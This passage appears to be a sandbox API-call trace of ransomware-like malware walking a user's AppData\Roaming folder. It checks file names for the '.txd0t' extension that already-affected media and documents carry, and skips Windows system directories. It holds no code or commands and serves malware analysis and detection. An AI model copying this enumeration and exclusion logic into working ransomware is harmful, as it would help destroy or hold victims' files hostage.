psz2=".txd0t") returned 0 [0119.284] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8272fdf0, ftCreationTime.dwHighDateTime=0x1d5e492, ftLastAccessTime.dwLowDateTime=0x5b120f00, ftLastAccessTime.dwHighDateTime=0x1d5e7d8, ftLastWriteTime.dwLowDateTime=0x50340bb3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xe332, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="f_xuR_I_FeQoISyA_I.avi.txd0t", cAlternateFileName="F_XUR_~1.TXD")) returned 1 [0119.284] StrCmpW (psz1="f_xuR_I_FeQoISyA_I.avi.txd0t", psz2=".") returned 1 [0119.284] StrCmpW (psz1="f_xuR_I_FeQoISyA_I.avi.txd0t", psz2="..") returned 1 [0119.284] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.284] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.284] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="f_xuR_I_FeQoISyA_I.avi.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi.txd0t" [0119.284] PathFindExtensionW (pszPath="f_xuR_I_FeQoISyA_I.avi.txd0t") returned=".txd0t" [0119.284] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.284] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec6ceb60, ftCreationTime.dwHighDateTime=0x1d5e516, ftLastAccessTime.dwLowDateTime=0xab8a54e0, ftLastAccessTime.dwHighDateTime=0x1d5e7ee, ftLastWriteTime.dwLowDateTime=0x50340bb3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17558, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="j9Q4P.avi.txd0t", cAlternateFileName="J9Q4PA~1.TXD")) returned 1 [0119.284] StrCmpW (psz1="j9Q4P.avi.txd0t", psz2=".") returned 1 [0119.284] StrCmpW (psz1="j9Q4P.avi.txd0t", psz2="..") returned 1 [0119.284] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.284] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.284] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="j9Q4P.avi.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi.txd0t" [0119.284] PathFindExtensionW (pszPath="j9Q4P.avi.txd0t") returned=".txd0t" [0119.285] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.285] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76d197f0, ftCreationTime.dwHighDateTime=0x1d5ee41, ftLastAccessTime.dwLowDateTime=0xc11de6a0, ftLastAccessTime.dwHighDateTime=0x1d5eaff, ftLastWriteTime.dwLowDateTime=0x50366d80, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3888, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="juYPe6EuKhsFCwN.mp3.txd0t", cAlternateFileName="JUYPE6~1.TXD")) returned 1 [0119.285] StrCmpW (psz1="juYPe6EuKhsFCwN.mp3.txd0t", psz2=".") returned 1 [0119.285] StrCmpW (psz1="juYPe6EuKhsFCwN.mp3.txd0t", psz2="..") returned 1 [0119.285] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.285] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.285] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="juYPe6EuKhsFCwN.mp3.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3.txd0t" [0119.285] PathFindExtensionW (pszPath="juYPe6EuKhsFCwN.mp3.txd0t") returned=".txd0t" [0119.285] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.285] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92c23c0, ftCreationTime.dwHighDateTime=0x1d5eab2, ftLastAccessTime.dwLowDateTime=0xd095ca70, ftLastAccessTime.dwHighDateTime=0x1d5ee11, ftLastWriteTime.dwLowDateTime=0x50366d80, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3186, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="jZeT4BL.m4a.txd0t", cAlternateFileName="JZET4B~1.TXD")) returned 1 [0119.285] StrCmpW (psz1="jZeT4BL.m4a.txd0t", psz2=".") returned 1 [0119.285] StrCmpW (psz1="jZeT4BL.m4a.txd0t", psz2="..") returned 1 [0119.285] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.285] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.285] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="jZeT4BL.m4a.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a.txd0t" [0119.285] PathFindExtensionW (pszPath="jZeT4BL.m4a.txd0t") returned=".txd0t" [0119.285] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.285] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cdcf0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xd35c70fc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe53cf090, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Macromedia", cAlternateFileName="MACROM~1")) returned 1 [0119.285] StrCmpW (psz1="Macromedia", psz2=".") returned 1 [0119.285] StrCmpW (psz1="Macromedia", psz2="..") returned 1 [0119.285] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.285] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.285] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Macromedia", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia" [0119.285] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpSrch="\\windows\\system32\\") returned 0x0 [0119.285] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.285] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpSrch="\\windows\\system\\") returned 0x0 [0119.285] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.285] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Macromedia" [0119.285] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf521500, ftCreationTime.dwHighDateTime=0x1d5e90a, ftLastAccessTime.dwLowDateTime=0x98dc9440, ftLastAccessTime.dwHighDateTime=0x1d5e9db, ftLastWriteTime.dwLowDateTime=0x5038d105, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16060, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="mFz6aNQKv94_Rr.mkv.txd0t", cAlternateFileName="MFZ6AN~1.TXD")) returned 1 [0119.285] StrCmpW (psz1="mFz6aNQKv94_Rr.mkv.txd0t", psz2=".") returned 1 [0119.285] StrCmpW (psz1="mFz6aNQKv94_Rr.mkv.txd0t", psz2="..") returned 1 [0119.285] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.285] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.285] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="mFz6aNQKv94_Rr.mkv.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv.txd0t" [0119.285] PathFindExtensionW (pszPath="mFz6aNQKv94_Rr.mkv.txd0t") returned=".txd0t" [0119.286] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.286] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0119.286] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0119.286] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0119.286] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x707d980, ftCreationTime.dwHighDateTime=0x1d5e7a6, ftLastAccessTime.dwLowDateTime=0xdc072a60, ftLastAccessTime.dwHighDateTime=0x1d5efd4, ftLastWriteTime.dwLowDateTime=0x5038d105, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14e5a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="mlrbk-2k1.jpg.txd0t", cAlternateFileName="MLRBK-~1.TXD")) returned 1 [0119.286] StrCmpW (psz1="mlrbk-2k1.jpg.txd0t", psz2=".") returned 1 [0119.286] StrCmpW (psz1="mlrbk-2k1.jpg.txd0t", psz2="..") returned 1 [0119.286] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.286] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.286] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="mlrbk-2k1.jpg.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg.txd0t" [0119.286] PathFindExtensionW (pszPath="mlrbk-2k1.jpg.txd0t") returned=".txd0t" [0119.286] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.286] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfd8b64ce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0119.286] StrCmpW (psz1="Mozilla", psz2=".") returned 1 [0119.286] StrCmpW (psz1="Mozilla", psz2="..") returned 1 [0119.286] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.286] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.286] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Mozilla", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla" [0119.286] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpSrch="\\windows\\system32\\") returned 0x0 [0119.286] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.286] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpSrch="\\windows\\system\\") returned 0x0 [0119.286] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.286] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Mozilla" [0119.286] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x192c2260, ftCreationTime.dwHighDateTime=0x1d5ed5a, ftLastAccessTime.dwLowDateTime=0x19771aa0, ftLastAccessTime.dwHighDateTime=0x1d5e863, ftLastWriteTime.dwLowDateTime=0x504be593, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9384, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="n5hRh8HkX hRtD-9n.png.txd0t", cAlternateFileName="N5HRH8~1.TXD")) returned 1 [0119.286] StrCmpW (psz1="n5hRh8HkX hRtD-9n.png.txd0t", psz2=".") returned 1 [0119.286] StrCmpW (psz1="n5hRh8HkX hRtD-9n.png.txd0t", psz2="..") returned 1 [0119.286] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.286] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.286] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="n5hRh8HkX hRtD-9n.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png.txd0t" [0119.286] PathFindExtensionW (pszPath="n5hRh8HkX hRtD-9n.png.txd0t") returned=".txd0t" [0119.286] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.286] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b5f9690, ftCreationTime.dwHighDateTime=0x1d5e9aa, ftLastAccessTime.dwLowDateTime=0xc0b6aad0, ftLastAccessTime.dwHighDateTime=0x1d5f059, ftLastWriteTime.dwLowDateTime=0x504be593, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xeb73, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="PDHYzrp.wav.txd0t", cAlternateFileName="PDHYZR~1.TXD")) returned 1 [0119.286] StrCmpW (psz1="PDHYzrp.wav.txd0t", psz2=".") returned 1 [0119.287] StrCmpW (psz1="PDHYzrp.wav.txd0t", psz2="..") returned 1 [0119.287] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.287] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.287] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="PDHYzrp.wav.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav.txd0t" [0119.287] PathFindExtensionW (pszPath="PDHYzrp.wav.txd0t") returned=".txd0t" [0119.287] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.287] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4dde220, ftCreationTime.dwHighDateTime=0x1d5ee16, ftLastAccessTime.dwLowDateTime=0xc522b3d0, ftLastAccessTime.dwHighDateTime=0x1d5ea40, ftLastWriteTime.dwLowDateTime=0x5050a777, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16842, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="PjcNBr9EvQRuRkXhA.swf.txd0t", cAlternateFileName="PJCNBR~1.TXD")) returned 1 [0119.287] StrCmpW (psz1="PjcNBr9EvQRuRkXhA.swf.txd0t", psz2=".") returned 1 [0119.287] StrCmpW (psz1="PjcNBr9EvQRuRkXhA.swf.txd0t", psz2="..") returned 1 [0119.287] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.287] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.287] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="PjcNBr9EvQRuRkXhA.swf.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf.txd0t" [0119.287] PathFindExtensionW (pszPath="PjcNBr9EvQRuRkXhA.swf.txd0t") returned=".txd0t" [0119.287] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.287] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x601f7690, ftCreationTime.dwHighDateTime=0x1d5e20b, ftLastAccessTime.dwLowDateTime=0x162740b0, ftLastAccessTime.dwHighDateTime=0x1d5ef24, ftLastWriteTime.dwLowDateTime=0x5050a777, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13c70, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="pMTil.png.txd0t", cAlternateFileName="PMTILP~1.TXD")) returned 1 [0119.287] StrCmpW (psz1="pMTil.png.txd0t", psz2=".") returned 1 [0119.287] StrCmpW (psz1="pMTil.png.txd0t", psz2="..") returned 1 [0119.287] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.287] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.287] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="pMTil.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png.txd0t" [0119.287] PathFindExtensionW (pszPath="pMTil.png.txd0t") returned=".txd0t" [0119.287] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.287] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb8ec20, ftCreationTime.dwHighDateTime=0x1d5e760, ftLastAccessTime.dwLowDateTime=0x4d8cc740, ftLastAccessTime.dwHighDateTime=0x1d5eee9, ftLastWriteTime.dwLowDateTime=0x5050a777, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18d33, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="QsWrg_KB.mp3.txd0t", cAlternateFileName="QSWRG_~1.TXD")) returned 1 [0119.287] StrCmpW (psz1="QsWrg_KB.mp3.txd0t", psz2=".") returned 1 [0119.287] StrCmpW (psz1="QsWrg_KB.mp3.txd0t", psz2="..") returned 1 [0119.287] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.287] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.287] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="QsWrg_KB.mp3.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3.txd0t" [0119.287] PathFindExtensionW (pszPath="QsWrg_KB.mp3.txd0t") returned=".txd0t" [0119.287] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.287] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c1f48f0, ftCreationTime.dwHighDateTime=0x1d5e138, ftLastAccessTime.dwLowDateTime=0x4a2ac600, ftLastAccessTime.dwHighDateTime=0x1d5e571, ftLastWriteTime.dwLowDateTime=0x50530b55, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16f6a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="s8RH8_.mp3.txd0t", cAlternateFileName="S8RH8_~1.TXD")) returned 1 [0119.287] StrCmpW (psz1="s8RH8_.mp3.txd0t", psz2=".") returned 1 [0119.287] StrCmpW (psz1="s8RH8_.mp3.txd0t", psz2="..") returned 1 [0119.288] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.288] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.288] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="s8RH8_.mp3.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3.txd0t" [0119.288] PathFindExtensionW (pszPath="s8RH8_.mp3.txd0t") returned=".txd0t" [0119.288] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.288] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ac925c0, ftCreationTime.dwHighDateTime=0x1d5e2ad, ftLastAccessTime.dwLowDateTime=0x51c69580, ftLastAccessTime.dwHighDateTime=0x1d5edda, ftLastWriteTime.dwLowDateTime=0x50556d6e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1e27, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="SKsJaHK4avL.odp.txd0t", cAlternateFileName="SKSJAH~1.TXD")) returned 1 [0119.288] StrCmpW (psz1="SKsJaHK4avL.odp.txd0t", psz2=".") returned 1 [0119.288] StrCmpW (psz1="SKsJaHK4avL.odp.txd0t", psz2="..") returned 1 [0119.288] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.288] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.288] 